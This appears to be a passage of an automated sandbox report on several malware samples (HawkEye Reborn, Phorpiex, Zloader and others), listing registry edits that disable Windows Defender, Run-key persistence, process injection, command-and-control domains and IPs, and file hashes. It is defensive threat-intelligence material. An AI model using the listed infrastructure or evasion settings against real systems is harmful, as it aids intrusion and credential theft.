NL 146.185.176.36:53 younika-hayde.bazar udp
US 8.8.8.8:53 141.208.208.185.in-addr.arpa udp
US 8.8.8.8:53 45.9.196.82.in-addr.arpa udp
US 8.8.8.8:53 179.170.17.178.in-addr.arpa udp
US 8.8.8.8:53 36.176.185.146.in-addr.arpa udp
SE 89.35.39.64:53 younika-hayde.bazar udp
RO 89.18.27.167:53 younika-hayde.bazar udp
US 8.8.8.8:53 64.39.35.89.in-addr.arpa udp
US 8.8.8.8:53 167.27.18.89.in-addr.arpa udp
RU 77.73.68.161:53 younika-hayde.bazar udp
RU 91.217.137.37:53 younika-hayde.bazar udp
RU 185.117.154.144:53 younika-hayde.bazar udp
US 8.8.8.8:53 144.154.117.185.in-addr.arpa udp
US 8.8.8.8:53 161.68.73.77.in-addr.arpa udp
SE 176.126.70.119:53 younika-hayde.bazar udp
SG 139.99.96.146:53 younika-hayde.bazar udp
US 8.8.8.8:53 146.96.99.139.in-addr.arpa udp
US 8.8.8.8:53 119.70.126.176.in-addr.arpa udp
UA 217.12.210.54:53 younika-hayde.bazar udp
GB 185.164.136.225:53 younika-hayde.bazar udp
US 192.52.166.110:53 younika-hayde.bazar udp
US 63.231.92.27:53 younika-hayde.bazar udp
US 8.8.8.8:53 225.136.164.185.in-addr.arpa udp
US 8.8.8.8:53 110.166.52.192.in-addr.arpa udp
CA 66.70.211.246:53 younika-hayde.bazar udp
US 96.47.228.108:53 younika-hayde.bazar udp
US 8.8.8.8:53 246.211.70.66.in-addr.arpa udp
US 8.8.8.8:53 108.228.47.96.in-addr.arpa udp
US 8.8.8.8:53 27.92.231.63.in-addr.arpa udp
US 45.32.160.206:53 younika-hayde.bazar udp
US 128.52.130.209:53 younika-hayde.bazar udp
US 8.8.8.8:53 206.160.32.45.in-addr.arpa udp
US 8.8.8.8:53 209.130.52.128.in-addr.arpa udp
US 35.196.105.24:53 younika-hayde.bazar udp
US 172.98.193.42:53 younika-hayde.bazar udp
US 8.8.8.8:53 42.193.98.172.in-addr.arpa udp
US 8.8.8.8:53 24.105.196.35.in-addr.arpa udp
US 162.248.241.94:53 younika-hayde.bazar udp
US 107.172.42.186:53 younika-hayde.bazar udp
US 8.8.8.8:53 94.241.248.162.in-addr.arpa udp
US 8.8.8.8:53 186.42.172.107.in-addr.arpa udp
US 167.99.153.82:53 younika-hayde.bazar udp
US 138.197.25.214:53 younika-hayde.bazar udp
US 8.8.8.8:53 214.25.197.138.in-addr.arpa udp
US 8.8.8.8:53 82.153.99.167.in-addr.arpa udp
US 69.164.196.21:53 younika-hayde.bazar udp
US 8.8.8.8:53 21.196.164.69.in-addr.arpa udp
US 8.8.8.8:53 122.10.44.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

91s

Max time network

159s

Command Line

"C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe"

Signatures

HawkEye Reborn

keylogger trojan stealer spyware hawkeye_reborn

Hawkeye_reborn family

hawkeye_reborn

M00nd3v_Logger

stealer spyware m00nd3v_logger

M00nd3v_logger family

m00nd3v_logger

M00nD3v Logger payload

infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A bot.whatismyipaddress.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3920 set thread context of 220 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3920 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
PID 3920 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe

"C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe"

C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe

"{path}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 bot.whatismyipaddress.com udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/3920-0-0x0000000074E82000-0x0000000074E83000-memory.dmp

memory/3920-1-0x0000000074E80000-0x0000000075431000-memory.dmp

memory/3920-2-0x0000000074E80000-0x0000000075431000-memory.dmp

memory/3920-3-0x0000000074E80000-0x0000000075431000-memory.dmp

memory/220-4-0x0000000000400000-0x0000000000490000-memory.dmp

memory/3920-6-0x0000000074E80000-0x0000000075431000-memory.dmp

memory/220-7-0x0000000074E80000-0x0000000075431000-memory.dmp

memory/220-8-0x0000000074E80000-0x0000000075431000-memory.dmp

memory/220-9-0x0000000074E80000-0x0000000075431000-memory.dmp

memory/220-10-0x0000000074E80000-0x0000000075431000-memory.dmp

memory/220-12-0x0000000074E80000-0x0000000075431000-memory.dmp

memory/220-13-0x0000000074E80000-0x0000000075431000-memory.dmp

Analysis: behavioral16

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

155s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\inps_979.xls"

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\inps_979.xls"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 210.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

memory/4904-2-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

memory/4904-1-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

memory/4904-3-0x00007FFA4D26D000-0x00007FFA4D26E000-memory.dmp

memory/4904-0-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

memory/4904-6-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-7-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-5-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

memory/4904-9-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-8-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp

memory/4904-4-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-11-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-12-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-13-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-10-0x00007FFA0B1F0000-0x00007FFA0B200000-memory.dmp

memory/4904-15-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-14-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-16-0x00007FFA0B1F0000-0x00007FFA0B200000-memory.dmp

memory/4904-17-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-19-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-21-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-20-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-18-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

memory/4904-31-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp

Analysis: behavioral12

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\good.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A

Phorphiex family

phorphiex

Phorphiex, Phorpiex

worm trojan loader phorphiex

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\3049586940303040\wcfgmgr32.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1" C:\Windows\3049586940303040\wcfgmgr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WCfgMgr32 = "C:\\Windows\\3049586940303040\\wcfgmgr32.exe" C:\Users\Admin\AppData\Local\Temp\good.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCfgMgr32 = "C:\\Windows\\3049586940303040\\wcfgmgr32.exe" C:\Users\Admin\AppData\Local\Temp\good.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\3049586940303040\wcfgmgr32.exe C:\Users\Admin\AppData\Local\Temp\good.exe N/A
File opened for modification C:\Windows\3049586940303040\wcfgmgr32.exe C:\Users\Admin\AppData\Local\Temp\good.exe N/A
File opened for modification C:\Windows\3049586940303040 C:\Users\Admin\AppData\Local\Temp\good.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\good.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\3049586940303040\wcfgmgr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 620 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\good.exe C:\Windows\3049586940303040\wcfgmgr32.exe
PID 620 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\good.exe C:\Windows\3049586940303040\wcfgmgr32.exe
PID 620 wrote to memory of 4016 N/A C:\Users\Admin\AppData\Local\Temp\good.exe C:\Windows\3049586940303040\wcfgmgr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\good.exe

"C:\Users\Admin\AppData\Local\Temp\good.exe"

C:\Windows\3049586940303040\wcfgmgr32.exe

C:\Windows\3049586940303040\wcfgmgr32.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
NL 92.63.197.153:80 tcp
US 8.8.8.8:53 efhoahegue.ru udp
DE 92.246.89.93:80 efhoahegue.ru tcp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 21.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 afhoahegue.ru udp
US 8.8.8.8:53 rfhoahegue.ru udp
US 8.8.8.8:53 tfhoahegue.ru udp
US 8.8.8.8:53 xfhoahegue.ru udp
US 8.8.8.8:53 efhoahegue.su udp
US 8.8.8.8:53 afhoahegue.su udp
US 8.8.8.8:53 rfhoahegue.su udp
US 8.8.8.8:53 tfhoahegue.su udp
US 8.8.8.8:53 xfhoahegue.su udp
NL 92.63.197.153:80 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
NL 92.63.197.153:80 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 92.63.197.153:80 tcp
NL 92.63.197.153:80 tcp
NL 92.63.197.153:80 tcp

Files

memory/620-0-0x0000000000400000-0x0000000002CE4000-memory.dmp

memory/620-2-0x0000000002E80000-0x0000000002F80000-memory.dmp

memory/620-3-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Windows\3049586940303040\wcfgmgr32.exe

MD5 b034e2a7cd76b757b7c62ce514b378b4
SHA1 27d15f36cb5e3338a19a7f6441ece58439f830f2
SHA256 90d3580e187b631a9150bbb4a640b84c6fa990437febdc42f687cc7b3ce1deac
SHA512 1cea6503cf244e1efb6ef68994a723f549126fc89ef8a38c76cdcc050d2a4524e96402591d1d150d927a12dcac81084a8275a929cf6e5933fdf62502c9c84385

memory/4016-9-0x0000000000400000-0x0000000002CE4000-memory.dmp

memory/620-10-0x0000000000400000-0x0000000002CE4000-memory.dmp

memory/4016-12-0x0000000000400000-0x0000000002CE4000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

152s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\june9.dll,#1

Signatures

Zloader family

zloader

Zloader, Terdot, DELoader, ZeusSphinx

trojan botnet zloader

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4920 set thread context of 2604 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\msiexec.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\june9.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\june9.dll,#1

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 182.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 86.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 snnmnkxdhflwgthqismb.com udp
US 8.8.8.8:53 snnmnkxdhflwgthqismb.com udp
US 8.8.8.8:53 snnmnkxdhflwgthqismb.com udp
US 8.8.8.8:53 nlbmfsyplohyaicmxhum.com udp
US 8.8.8.8:53 nlbmfsyplohyaicmxhum.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 nlbmfsyplohyaicmxhum.com udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

memory/4920-0-0x00000000754EF000-0x00000000754F2000-memory.dmp

memory/4920-2-0x00000000754A0000-0x0000000075521000-memory.dmp

memory/4920-1-0x00000000754A0000-0x0000000075521000-memory.dmp

memory/4920-3-0x00000000754A0000-0x0000000075521000-memory.dmp

memory/4920-4-0x00000000754EF000-0x00000000754F2000-memory.dmp

memory/2604-6-0x0000000000B60000-0x0000000000B8B000-memory.dmp

memory/4920-8-0x00000000754A0000-0x0000000075521000-memory.dmp

memory/2604-9-0x0000000000B60000-0x0000000000B8B000-memory.dmp

memory/2604-11-0x0000000000B60000-0x0000000000B8B000-memory.dmp

memory/2604-12-0x0000000000B60000-0x0000000000B8B000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-12-04 19:31

Reported

2024-12-04 19:36

Platform

win10v2004-20241007-en

Max time kernel

142s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Uses the VBS compiler for execution

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Local\\Temp\\file.exe" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4412 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 2408 wrote to memory of 5020 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 2408 wrote to memory of 5020 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 376 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 376 wrote to memory of 1636 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\System32\Conhost.exe
PID 376 wrote to memory of 1636 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\System32\Conhost.exe
PID 4412 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 3828 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 3828 wrote to memory of 3628 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 3828 wrote to memory of 3628 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 4412 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
PID 1336 wrote to memory of 3744 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 1336 wrote to memory of 3744 N/A C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
PID 4412 wrote to memory of 4368 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
